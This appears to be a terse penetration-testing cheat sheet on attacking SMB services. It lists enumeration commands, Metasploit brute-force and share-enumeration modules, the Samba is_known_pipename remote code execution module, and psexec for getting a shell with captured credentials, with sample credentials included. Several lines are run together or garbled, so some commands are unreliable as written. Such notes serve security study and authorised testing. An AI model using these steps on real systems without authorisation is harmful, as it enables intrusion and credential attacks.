SMB uses port 445 on modern Windows systems. In older versions of windows it runs on port 139 via NetBIOS. Some systems host SMB on both 445 and 139 ports for compatibility reasons.
net use <any driver character> : \\ <ip address> \ <driver character >$ <password> /user: <username>
We can use -L to list available shares ==> smbclient -L //<ip>/ -U <username>
To login select a share and remove the -L ==> smbclient //<ip>/<shared_folder> -U <username>
nmap -p445 --script smb-enum-users.nse <ip> (Requires ANONYMOUS LOGON)| Module | Description | Other information |
|---|---|---|
| auxiliary/scanner/smb/smb_version | SMB Version Detection | |
| auxiliary/scanner/smb/smb_enumusers | SMB User Enumeration (SAM EnumUsers) | Even the module doesn't Requires an SMBUser & SMBPass but the Target machine does require so... |
| auxiliary/scanner/smb/smb_enumshares | SMB Share Enumeration | |
| auxiliary/scanner/smb/smb_login | SMB BruteForce | Password list location: set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt |
there also smb msf modules :
search type:auxiliary name:smbsearch auxiliary/scanner/smb/exploit/linux/samba/is_known_pipename
smbmap
smbmap -H 192.168.1.100 -u administrator -p smbserver_771nmblookup
smbclient
rpcclient
enum4linux
enum4linux -u administrator -p smbserver_771 192.168.1.100-a : enum4linux -a -u administrator -p smbserver_771 192.168.1.100is vulnerable to a remote code execution vulnerability, allowing a malicious client to upload a shared library to a writable share, and then cause the server to load and execute it.
Has also a MSF module to exploit: exploit/linux/samba/is_known_pipename
set the target to automatic command.
and run.
If we got SMB creds we can use SMB PsExec python file or the MSF_Module π to execute commands or get a shell.
psexec.py @<target_ip>exploit/windows/smb/psexec
! right